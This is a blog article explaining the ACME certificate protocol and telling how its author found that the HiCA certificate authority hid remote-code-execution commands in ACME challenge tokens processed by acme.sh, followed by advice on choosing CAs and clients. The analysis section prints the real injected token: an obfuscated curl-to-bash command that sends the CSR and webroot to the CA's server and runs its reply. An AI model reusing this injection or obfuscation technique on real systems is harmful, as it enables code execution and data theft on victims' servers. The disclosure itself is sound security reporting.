The ACME protocol may become nearly as important as TLS itself.

Its strong theoretical foundation has made a profound impact in practice, yet sometimes reality interjects in unexpected ways. Let us examine the wild, wonderful, and spiky world of TLS automation with ACME.

This article is geared toward site owners, system administrators, and developers of Web infrastructure software. There are 3 main sections:

- ACME 101 - a primer to help you understand the ACME protocol.

- A Little RCE Story - the true story of discovering the (first?) 0-day in an ACME client.

- ACME Servers and Clients - practical information for site owners.

Feel free to skip any section that's irrelevant or not of interest to you.

ACME 101

ACME is the protocol, defined in RFC 8555, that lets you obtain TLS certificates automatically, without manual intervention. If you've set up a website in the last 5-8 years, it most likely got its HTTPS via ACME. If your sites have HTTPS and you never had to fetch a certificate bundle from an email attachment, you're benefitting from ACME. If you've used Let's Encrypt, or set up Certbot, acme.sh, lego, Certify the Web, cert-manager, NGINX Proxy Manager, or other similar programs, then you've used ACME directly, even if you didn't know why or what it was doing.

Certificate authorities (CAs) may operate ACME servers to make it possible to completely automate the management of certificates. This increases reliability and uptime, reduces human error, allows for shorter certificate lifetimes, enables TLS/HTTPS at massive scale, and improves security and privacy overall. Site owners then use ACME clients to obtain certificates from CAs automatically and renew them before they expire.

In a nutshell, ACME verifies ownership or control of identifiers (or "subjects") via challenges. The HTTP challenge (http-01) uses DNS and then HTTP on port 80, the TLS-ALPN challenge (tls-alpn-01) uses DNS and then TLS on port 443, and the DNS challenge (dns-01) just uses DNS records directly. Each challenge verifies that you own or control either the DNS zone of a site or the content served on those special HTTP/S ports.
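To make the challenge types a bit more concrete, here's a minimal Go sketch of where the proof ends up for http-01 and dns-01. It assumes you already have a "key authorization" string (the token joined with a thumbprint of your account key, explained later in this article); the token and thumbprint values below are placeholders.

```go
package main

import (
	"crypto/sha256"
	"encoding/base64"
	"fmt"
)

// http01URL returns the URL the CA fetches for an http-01 challenge
// (RFC 8555 section 8.3); the response body must be the key authorization.
func http01URL(domain, token string) string {
	return "http://" + domain + "/.well-known/acme-challenge/" + token
}

// dns01Record returns the TXT record name and value for a dns-01 challenge
// (RFC 8555 section 8.4): the value is the unpadded base64url encoding of the
// SHA-256 digest of the key authorization.
//
// tls-alpn-01 (RFC 8737) is omitted: it serves a self-signed certificate whose
// acmeIdentifier extension holds that same digest, negotiated via the
// "acme-tls/1" ALPN protocol on port 443.
func dns01Record(domain, keyAuth string) (name, value string) {
	sum := sha256.Sum256([]byte(keyAuth))
	return "_acme-challenge." + domain, base64.RawURLEncoding.EncodeToString(sum[:])
}

func main() {
	// Placeholder values for illustration only.
	domain := "example.com"
	token := "evaGxfADs6pSRb2LAv9IZf17Dt3juxGJ-PCt92wr-oA"
	keyAuth := token + ".placeholder-account-thumbprint"

	fmt.Println("http-01:", http01URL(domain, token))
	name, value := dns01Record(domain, keyAuth)
	fmt.Println("dns-01: ", name, "TXT", value)
}
```

The http-01 path is always under /.well-known/acme-challenge/, which is worth remembering later in this story.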

ACME made the prior state of the art obsolete. Before, you had to check your (very secure 🙄) email inbox for a link; download the certificate bundle; format it properly for your server; install the certificate with the right permissions; reload your server config; and hope you didn't do anything wrong, because then your site would be down. And don't forget to do it all again a year later, before the certificate expired.

This new level of security and automation was not publicly available until 2015, and was standardized four years later as RFC 8555. It was initially proposed and designed by researchers from the Electronic Frontier Foundation, the University of Michigan, and Stanford, together with industry partners including Cisco and Mozilla. The first CA to implement ACME was Let's Encrypt, currently the largest CA by active certificates (and one of the smallest by staff, proving ACME's effectiveness). And the best part for us is: it's completely free to use. Let's Encrypt is a non-profit organization.

With ACME + Let's Encrypt, it was now possible to set up a server or web application and have it serve over HTTPS automatically and by default, without any user intervention, in a matter of seconds. (Unfortunately, Caddy remains the only general-purpose web server to use HTTPS automatically and by default. Other servers still require manual configuration even when using Let's Encrypt.) This was a huge win for privacy and security, and it transformed the Web seemingly overnight: now, an estimated 95% of page loads happen over HTTPS thanks to the availability of automated certificates through Let's Encrypt and other (usually free) ACME CAs.

ACME makes the Internet more reliable and secure, there's no doubt about it. BUT, the price of this benefit is having sufficient skill and knowledge to operate your server(s). Because ACME automates security-critical tasks, you need to know what it's doing and what the implications are.

A Little RCE Story

I needed a very specific image to make a dumb meme: Superman but with the ACME logo on his chest.

It was OK if it looked shabby. I just wanted to reply to a tweet to make a statement. (A statement that would get... checks notes... 3 likes.)

So I searched for "ietf acme logo filetype:svg", and one of the top results led me to a documentation site for an ACME CA I had never heard of, named HiCA, on a Chinese domain (hi.cn).

I saved the image and happily created and posted my dumb little meme. Then I went back to the site where I found the logo, which used the ACME logo as its own in the top-left corner. "That's bold," I thought. "This must be a very ACME-centric service."

Exploration

Curiosity led me through pages of the docs, back to the homepage, and then back to the documentation. I found all sorts of interesting things, and "curious" really is the best word to describe them:



- This was a free CA but with paid perks, like using a larger RSA key size or any ECC key.

- Payment was made not via EAB (ACME's standardized solution for managing out-of-band accounts and payments), but through some sort of QR code? Odd, but OK.

- They issued certificates for IPv4 and IPv6 addresses via ACME, if you paid.

- They had "accelerated" OCSP and CRL services for China.

- They apparently issued 180-day certificates, boasting a better product than "most vendor" which "provide 90 days certificates".

- "HiCA is operated by PKI (Chongqing) Co., Ltd. (公钥认证服务(重庆)有限公司), which founded at Jul 2022."



- They do not support the TLS-ALPN challenge.

So many questions!



Since I love trying new ACME CAs with my projects (Caddy, CertMagic, and ACMEz), I opened the directory endpoint in Firefox to check it out. Sure enough, there was a valid ACME directory, with one odd part: the "caaIdentities" field contained identities such as "hi.cn", "ssl.com", "pki.goog", and several others.

That field is used for setting CAA DNS records. By listing those identities, HiCA was declaring that certificates it provides may be issued by the CAs behind all of those domains. It's very unusual to list so many. Setting these records would give authority for all those CAs to issue certificates for your domain, even though you (think you) are using HiCA.

I also noticed that "externalAccountBinding" was false, which means that I don't need any separate account to get certificates from them. Great, that makes things easy!

Then I got to the parts that nerd-sniped me:



Due to our EULA, you need and can only access our service via ACME.sh. No other ACME clients are allowed. We welcome your report if any organization or individual is providing a GUI, webpage, or app that uses our service at report-abuse@corp.hi.cn.

Stop using Caddy with HiCA to avoid wasting your time.

Well then, challenge accepted.

A discovery

I was able to load the directory endpoint in Firefox, but when I made the same request with curl, I got an error back stating that "only acme.sh was allowed to access." I added -H "User-Agent: Mozilla" to my command and successfully got a directory back.

Ooookay then.

Next, I twiddled some bits in CertMagic to make sure the User-Agent started with "Mozilla", configured it with HiCA's directory endpoint, and ran it. (In practice, configuring a CA's directory endpoint should be all you need to use it.)

Failure. Not surprising. The error message involved trying a URL of ../pki-validation, which is neither a full URL nor what I would expect: that path only appears in section 3.2.2.4.18 of the CA/Browser Forum Baseline Requirements (BR), and it is not standard ACME.

To learn more, I enabled debug logging, and made a fascinating discovery: the Challenge object, which should contain cryptographically-sensitive token and keyAuthorization values, looked something like this:

    {
        Type: http-01
        URL: ../pki-validation
        Status: pending
        Token: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#
        KeyAuthorization: dd#acme.hi.cn/acme/v2/precheck-http/123456/654321#http-01#/tmp/$(curl`IFS=^;cmd=base64^-d;$cmd<<<IA==`-sF`IFS=^;cmd=base64^-d;$cmd<<<IA==`csr=@$csr`IFS=^;cmd=base64^-d;$cmd<<<IA==`https$(IFS=^;cmd=base64^-d;$cmd<<<Oi8v)acme.hi.cn/acme/csr/http/123456/654321?o=$_w|bash)#.GfCBN3dYnfNB-Hj1nBYek89o9ohtt9K59uacS13wigw
    }

Analysis

The token is supposed to contain at least 128 bits of cryptographically secure entropy, encoded as URL-safe base64 (RFC 8555 section 8.3). However, you can see that the Token string is clearly being abused to carry additional fields that can be parsed by splitting on #:

- I don't know what `dd` means.

- The next part is clearly a URL to a "precheck-http" resource for this challenge; this is NOT part of the ACME protocol. I found that it returns the error "csr not submitted" if you request it before successfully calling the `csr/http` endpoint.

- The next part of the token is the challenge type, http-01 in this case.

- The part starting with "/tmp/" is a path to a temporary folder or file, and it is the most concerning. It looks intimidating, but let's break it down: a `curl` command is assembled by inline scripts that produce " " (a space) and "://" by base64-decoding "IA==" and "Oi8v", respectively. The result is a command like `curl -sF csr=@... https://...?o=$_w`. In other words, it sends the CSR (from the acme.sh variable `$csr`) and your webroot (`$_w`) to the CA, and then pipes the response of that command straight into bash. If the downloaded script is in fact executed, this is the textbook definition of "remote code execution" (RCE), or executing code on a target machine remotely, which is among the most severe exploits. I was anxious to verify whether this was in fact the case.

- An additional concern is that the token is supposed to contain at least 128 bits of entropy that the client cannot influence. From RFC 8555 section 11.3:

"First, the ACME client should not be able to influence the ACME server's choice of token as this may allow an attacker to reuse a domain owner's previous challenge responses for a new validation request."

- Error responses come with a 200 status and an `application/json` Content-Type, in violation of RFC 8555 (which describes errors as 4xx/5xx responses carrying `application/problem+json` problem documents) and of HTTP convention. This makes it tedious to handle errors correctly. Only "server error" responses returned 500.

- The second number in the endpoints (654321 in this example) increments for each challenge, which reveals roughly how many challenges the CA has handled. At the time, I saw numbers in the low hundred-thousands.

(The keyAuthorization field is simply the token, a period, and an encoded thumbprint of the ACME account key, concatenated.)

Well shoot.

HiCA was stealthily crafting curl commands and piping the response to bash to be executed. Only a shell script, or an ACME client that evaluates strings as shell commands, was capable of this. No wonder HiCA required acme.sh! It could apparently be tricked into running arbitrary code from a remote server‼️

So I set up a simple sandbox and tried using acme.sh with HiCA. Sure enough, the logs said "success", and I was confronted with a QR code to pay before being allowed to download my certificate because I forgot to change the key type to a weaker 2048-bit RSA key. 🙄 But my goal wasn't to download the cert - I just wanted to verify that remote code was being run.

Before going to bed that night, I raised an issue on GitHub to publish my initial findings and offer analysis. I didn't really know what was going on. Was this intentional? Perhaps some users expected it, and it was special behavior reserved for this one CA. acme.sh is an impressive ~8000 lines of shell, and I didn't feel like spending the time to figure it out. While I did claim that acme.sh was running arbitrary code, I hadn't directly confirmed that yet: I assumed this CA would fail to issue a cert without it, and I did get a success, but that alone didn't prove RCE.



It wasn't until a little later that evening that Aleksejs Popovs replicated the behavior and extracted the remote script, which was in fact confirmed to run on the client.

I updated the issue, posted my findings on Twitter, tagged the editor who added HiCA to the acme.sh wiki to ask for their insights, and went to bed.

Fallout

The next morning, I woke up to hundreds of notifications.

Overnight, the community had gotten busy scrutinizing the issue, and the Chinese intermediate CA had already been shut down.

That user I tagged in the issue? They were the operator of HiCA, who admitted to knowing about the behavior and not disclosing it to the developer:

... And 100% certainly [acme.sh developer] have no associated with this RCE issue even they don’t know the method we utilized when donation happen.

— Bruce Lam, HiCA founder

Neil Pang, the developer of acme.sh, confirmed that this was, in fact, unintended remote code execution (RCE):

I didn't know this particular vulnerability issue, but I knew they are using acme.sh to show QR code and do some payments.

— Neil Pang, acme.sh author

(Mr. Pang acted responsibly and immediately patched the script and tagged a new release. I want to remind readers that shell scripts are hard, and even skilled, well-intentioned developers have bugs, especially when acting in what should be a trusted context. Personally, I do not blame the developer for this kind of bug.)

And since it was already being exploited in the wild and was not a published bug, it qualifies as a "0-day".

Typically, a 0-day is a bug that the "bad guys" know about and start exploiting before the "good guys" do. By the time the "good guys" find out, it's too late to prevent attacks, and the best you can do is patch ASAP to avoid more. 0-days are among the most urgent vulnerabilities. And RCE is among the most severe. So a 0-day RCE is... really bad.

Now, in this case, it appears to be a "benign" exploitation (if there is such a thing). The HiCA operator played it off as gross incompetence, which is often indistinguishable from malice:

We don’t know this is RCE we only know it can be utilized to make traditional CA ssl enroll process possible in a famous ACME tool.

— Bruce Lam, HiCA founder

("That's not a security bug, that's a feature we can use!")

Even though the script dump we observed was not harmful, the server could be configured to deliver a harmful payload every N requests, or to deliver a harmless payload only to certain IP ranges. We may never know.

Incidentally, I received a lot of thank-yous and good-jobs, which was nice and all, but I feel like...

Started looking for an SVG logo

Found a 0-day RCE https://t.co/aUiIarcEUh pic.twitter.com/0yBgVPxKIT

— 🧗‍♂️ Matt Holt (@mholt6) June 10, 2023

The incident discussion continues on Google Groups, and Mr. Lam has respectfully participated in several threads despite a language barrier, and even joined the Let's Encrypt forum with a tagline of "Very 1st player of ACME.sh's CVE 0-day."

Implications

I believe this is the first 0-day that has ever been discovered in an ACME client. That is interesting, because a 0-day in an ACME client more or less implies a compromised CA. In theory, ACME clients should only be contacting explicitly-configured, highly trusted servers: certificate authorities (and potentially DNS providers if configured to use the DNS challenge). So a 0-day attack surface might look like any of these:

- Compromised CA (or, apparently, create your own incompetent/malicious CA)

- Compromised DNS provider API

- Compromised ACME client code base (e.g. malicious commit that sneaked something in)

- Exploited memory safety bug in the HTTP/TLS server (ACME clients will either open port 80/443 to solve challenges themselves or delegate that to an existing server; if either is written in C, it is more likely to be vulnerable to buffer overflows, etc.)

ACME clients typically handle highly sensitive cryptographic material. While you can set up more distributed and higher-maintenance, but lower-risk, clients that scope their permissions much more tightly, the most common setups may access private keys, manipulate DNS records, and serve endpoints on ports 80/443 -- and honestly, this is probably fine for most sites. I don't think everyone needs to panic and start airgapping private keys from their ACME clients, externally generating CSRs, and delegating DNS solving to sandboxed processes. In fact, please don't do that unless you have a really, really good reason to (red tape compliance, etc.), because you will make your life more complicated and miserable, probably get it wrong, and actually make your security worse. But I do think there is something to consider here, which I will discuss later on.

So if you can exploit an ACME client with a 0-day RCE, you can potentially do some pretty terrific and terrible things even without privilege escalation: steal keys and credentials, manipulate DNS, hijack HTTP/HTTPS content, and more. On top of this, too many people run ACME clients as root. More on this later as well.

To be clear, I believe the ACME and CA ecosystem is quite healthy overall. You are much better off using ACME for TLS than not. The systems in place help keep things secure and transparent. Thankfully, this exploit was just one very rare case, and the state of Internet security is, overall, good.

ACME Servers and Clients

The two big choices you need to make as a site owner are:

- Which ACME servers (CAs) to use

- Which ACME client(s) to use

Most mainstream ACME clients default to using Let's Encrypt as the CA, which is a fine choice for nearly everyone. You probably won't have to give the CA any thought. However, if you do choose your own, I recommend trusting multiple CAs but not too many. (A good ACME client will let you choose more than one for redundancy.) Currently, there are not too many ACME CAs, so in my opinion it's not yet possible to trust "too many" ACME CAs.

I recommend choosing as few ACME clients as possible (but not 0) -- ideally, exactly one. This simplifies your infrastructure and eases maintenance in the long run: you only have one set of software to learn.

Choosing trustworthy CAs

Honestly, you're probably good to use whatever a mainstream ACME client defaults to (usually Let's Encrypt). And if you do choose your own, it's probably fine to trust any root CA that is in public trust stores from countries that do not impose government-sponsored censorship.

However, resellers (called "intermediate CAs") are a thing, and they are not as regulated. In general, though, a combination of strong policies, strong cryptography, and strong PKI implementations prevent these entities from doing anything too abominable for too long in secret, especially because their parent CAs must still comply with BRs and submit to audits and transparency logs. There is still oversight, even if it's a layer removed.

Regardless of the type of CA, here are some things to watch out for, based on sound fundamental principles of modern PKI:

CA (ACME server) red flags:

🚩 The CA generates your CSR, or sees/requests your private key

🚩 Requires a particular ACME client or provides their own*

🚩 Does not work with ALL mainstream ACME clients

🚩 Asks for DNS credentials or control over your DNS

🚩 Cannot explain their trust chain

* It's OK for a CA to recommend or officially endorse or support a particular ACME client. Some may even distribute a fork of a popular client with presets for its ACME server. But ideally it should be verifiable and open source. The CA should still work with all other ACME clients!

ACMEisUptime.com lists some trustworthy ACME CAs, most of which are free. And the ones that aren't can offer business support if that's your jam. Among the trustworthy root CAs, don't fret too much as they are audited and regulated. I do recommend watching Certificate Transparency logs for your domains, and names like your domains. Facebook has a nice service for this: https://developers.facebook.com/tools/ct/search/

Your ACME client should support multiple ACME servers. Be sure to configure more than one. This will grant you automatic failover in case one server is down or blocked.

Choosing the right ACME client

To automate your certs, you'll need an ACME client. There are a lot to choose from, and obviously I have a bias. But after 8 years of industry experience across numerous small and large deployments, here are my blunt, candid thoughts on clients... (And note: any criticisms I share are strictly technical; I have the utmost respect for developers of other ACME clients and recognize their contributions to the Internet.)

Most clients will generate CSRs for you, which means they either need access to your site's private key or generate it themselves. Be aware of that: it is the most sensitive thing they do, possibly with the exception of manipulating your DNS records (some do this to solve the DNS-01 challenge). However, both of these sensitive tasks can be delegated to other parts of your system (with higher complexity costs) if required, depending on whether the ACME client supports that. I don't recommend doing this unless absolutely necessary.

Scrutinize your candidates. Not all ACME clients are created equal!

Based on my experience, the ideal ACME client is:

- Fully native to your application or server (not a plugin, wrapper, separate tool, etc.)

- Memory-safe (not C)

- Static (no shared libraries)

- Capable of using multiple ACME CAs

- Scales well to tens of thousands of certificates or more (for use cases that need it, you MUST consider this!)

- Well-documented

- Able to work with all ACME-compatible CAs by configuring only a directory URL (and possibly EAB)

- In compliance with best practices

In an early 2016 talk, Josh Aas, the executive director of Let's Encrypt, described 3 types of ACME clients:

- Simple (drop a cert in the current dir)

- Full-featured (configure server for you)

- Built-in (web server just does it)

Built-in is the best client experience!

Most clients are types 1 and 2. There are a small handful of type-3 clients such as Traefik and Caddy and some less-mainstream products. But even then, I think Caddy is the only mainstream server that uses ACME automatically and by default (no extra user config required to turn on HTTPS).

CLI clients

Many popular ACME clients like Certbot, acme.sh, and lego are CLI tools. And these are fine for transitioning to automated certificate infrastructure. But they are not good long-term solutions.

These CLI clients require setting up external timers and services. You have to verify the permissions are correct between the ACME client and the server and the OS. Error handling is sub-par. There are more moving parts to configure and maintain. They don't scale well. Package installers may take care of some of this for you, but most sysadmins don't know what's happening, making maintenance confusing, especially when upgrades or downgrades aren't possible due to version conflicts. And for some of them, unattended upgrades can have surprising breakage, leading to outages.

Here's the thing: CLI-based ACME clients were never the goal. The inventors of the ACME protocol and Let's Encrypt leadership have gone on record and published academic papers saying that the Caddy implementation of ACME specifically is an example of the gold standard they envision. But CLI tools were the obvious first step toward accomplishing the daunting task of converting the entire Web to HTTPS, as they could be easily dropped into existing infrastructure.

So that's what they did: distributed a cross-platform Python program that you could install next to your existing, traditional servers and, with a Python env and a cron job, it would keep your certs renewed and even reconfigure your web server for you on a timer. What could be easier? Well...

...Not having to do any of that -- having HTTPS "just work" and even be the default in your server via an embedded ACME client -- THAT would be easier, and that is STILL the goal. Even more so now that so much of the Web is encrypted. Let's Encrypt has shifted a lot of its efforts to sustain the massive growth the ecosystem has seen in recent years, but the client landscape needs more work, and that's our responsibility.

In my opinion, we should be dismantling separate CLI ACME tooling in favor of fully-integrated cert management. (For example and a bit of perspective: many of you can probably move your sites to Caddy in a few minutes or a few hours.) Integrated certificate management can be more reliable, more secure, less error-prone, and more scalable. I'm dismayed to see the modern Web evolving to rely on hail-Mary cron jobs rather than more reliable, resilient, and robust embedded ACME clients.

Technology stack considerations

That's not all, though. Even if you have an embedded ACME client, the technology stack matters. And not just for the sake of a flame war. I mean, it really has consequences in this context.

Some ACME clients are written in C/C++. This is concerning for the same reasons any C/C++ code in security/edge contexts is: memory-safety bugs account for 60-70% of security vulnerabilities. C's advantages are not particularly relevant in ACME contexts, especially where Go and Rust exist. Thus my conclusion is that C is not the best choice for ACME clients.

Some ACME clients are shell scripts. I think of shell scripts like C programs: they're very easy to get very wrong. The danger isn't memory vulnerabilities but input sanitization; shell syntax and its implications are very subtle. I understand the temptation of a shell script (portability, etc.). However, there be dragons. And this is not an area where you want dragons.

Compounding this, many CLI ACME clients are run as root. In some cases it is even recommended by their documentation. This is because these ACME clients straddle the HTTP and TLS server configs, sensitive files on disk, privileged ports, and a cron timer or service; and twiddling permissions to bind the right ports and write the right files is tricky and nuanced. But this has obvious pitfalls if something goes wrong, like a 0-day RCE in your ACME client.

Then there is the usual static vs. dynamically-linked binary debate. I strongly prefer static binaries, and I recommend that you do too. Dynamically-linked executables can break in unexpected ways when something obscure in the system changes. Dynamic binaries have dependencies that must be properly versioned and configured on the server, and nothing else must alter those. Package managers should refuse to upgrade or downgrade if there is a version conflict, but this is equally frustrating. I have successfully broken production servers on all flavors of Linux due to these issues. Maybe I am stupid, but more likely I'm ignorant, and it's really a problem. Yet I have never, ever once broken a static binary. If you want to guarantee uptime even though your OS has moving parts like shared libraries and packages, and take away your deployment headaches, use static binaries.

Other kinds of ACME clients

There are even more kinds of ACME clients. Some wrap web servers (like nginx-proxy). Others plug in (like mod_md). Some have a GUI that lets you manage and monitor certificates manually (like Certify the Web). Yet others integrate with specific infrastructure tools (like cert-manager). I don't have strong opinions on these kinds of clients, except for the points I already mentioned, which apply to their implementations. (For instance, mod_md is written in C. However, it does drop privileges, so attackers are limited in what they can do without privilege escalation, which is fairly unique among ACME clients!)

Clients that are built into whole infrastructure systems (like cert-manager) are good, as long as they provide zero-config HTTPS by default.

GUIs are nice for monitoring and manual reconfiguration of servers, but not for automation, as the GUI nature implies manual intervention or initialization (the GUI's other features are nice cherries on top).

Some types of clients scale well to tens of thousands of certificates; many don't. If you need this, make sure to look for one that explicitly mentions this as a design feature -- it really needs to be part of the intrinsic design of the client. Even the best clients may require some tuning or configuration to really massively scale.

There are enterprise solutions that do all sorts of things and may even be a combination of multiple client types.

My recommendations

Overall, I think the vast majority of ACME clients out there are not really suitable for long-term sustainable infrastructure, because they are tacked on as an afterthought, rather than being integrated with the application or server.

To optimize simplicity, reliability, and security, you want an ACME client that is built into the application or server you're deploying -- and I mean actually built-in, not just bundled as part of a package or wrapping another piece of software. Wrappers, forks, and plugins that add on ACME face similar problems: they are optional and not the default; ACME remains an afterthought.

There are many reasons why the visionaries of ACME and Let's Encrypt pushed for fully-native ACME clients. There are fewer moving parts. They're less error-prone. HTTPS can truly be the default. There are practical benefits too. For example, a good TLS server that staples OCSP responses to certificates can use that as an early warning flag for revocation and trigger an early renewal of the certificate before the valid OCSP staple expires -- all by default, without needing to be configured to do so. It can have fine-grained controls over error-handling and timers. It can coordinate management tasks and share resources in a cluster with minimal-to-no configuration. This kind of robustness just isn't possible with most of what's out there.

Most of the questions we see on the Caddy forum aren't about setting up HTTPS or solving certificate problems: it's more mundane things like how to reverse proxy to certain applications correctly. Whereas if you scan the Let's Encrypt forum (which is the primary support venue for Certbot), the vast majority of topics are problems getting all the moving parts to manage and use certificates correctly. (The Certbot engineers are highly skilled, but it's the whole premise of separate tooling that makes it complicated.)

I am fully convinced we will continue to have a hard time making reliable and scalable HTTPS the default of the Web while ACME clients are not built-in.

Fully-native ACME clients are best, and we could use more of them. Time will continue to prove it out.

Epilogue

And what'dya know, right before I published this, Brad Warren, the lead Certbot engineer from the EFF, proposed making Caddy the default recommendation of Let's Encrypt, citing 2 main reasons:

- It allows for better integration between the TLS server and the ACME management of those certificates. This is something that I think many of us have thought was important for a long time. Apache and nginx are the most popular web servers so to try to integrate with it in Certbot we attempt to reparse their server configuration with our own parsers, make modifications to it, interact it with it using shell commands, and sleep for arbitrary periods of time until the server has probably/hopefully finished doing things like reloading its configuration. While this fills a need while people are/were stuck on Apache and nginx, I think it is inherently more error prone and brittle than having the TLS server manage its certificates itself.

- Caddy is written in a memory safe language. Adoption of memory safe programming languages is something that both ISRG and the broader computer security community have been encouraging more and more lately. Recommending Caddy would help this effort by encouraging people away from web server options written in C/C++.

Like poetry. 🤌

Thanks for reading. Hope you found this helpful and thought-provoking. I tried to be as technically objective as possible while recognizing my obvious bias as the developer of Caddy, but also drawing from those years of experience.

If you liked this, please share on social media and in professional circles. You can also sponsor my work to continue working on privacy-focused software.

Let's upgrade the Web to be auto-HTTPS-by-default!

About the author

Matt is the author of the Caddy web server. He has over 8 years of experience with ACME, going back to before Let's Encrypt's public release in 2015, and has presented on the topic of TLS automation in small meetups and large conferences across the US and the world over the years. Matt wrote the first "auto-HTTPS-by-default" web server with an integrated ACME client, which now manages millions of certificates; and he has troubleshot thousands of issues for people related to ACME and certificates. He later worked with the Let's Encrypt team for a few years, so he has somewhat of a CA perspective as well. Matt continues to maintain the Caddy web server and supports businesses and individuals in upgrading their sites to use more robust, reliable, and secure HTTPS.

At the Let's Encrypt launch party, at a small bar and restaurant in San Francisco, I met, by happy coincidence, an author of the PHP/MySQL book that got me started on web development as a teen: Laura Thomson! Dr. Halderman was also there; I didn't realize at the time that he wrote the first academic paper I ever read, about cold boot attacks on RAM. (I replicated that paper repeatedly while in high school to study a phenomenon that I thought was fascinating.) I also had the honor of meeting the late Peter Eckersley, whom I think of as the main visionary for an encrypted Web. I have since dedicated the Caddy 2.6 release to Peter for his contributions to the project, the Internet, and the world.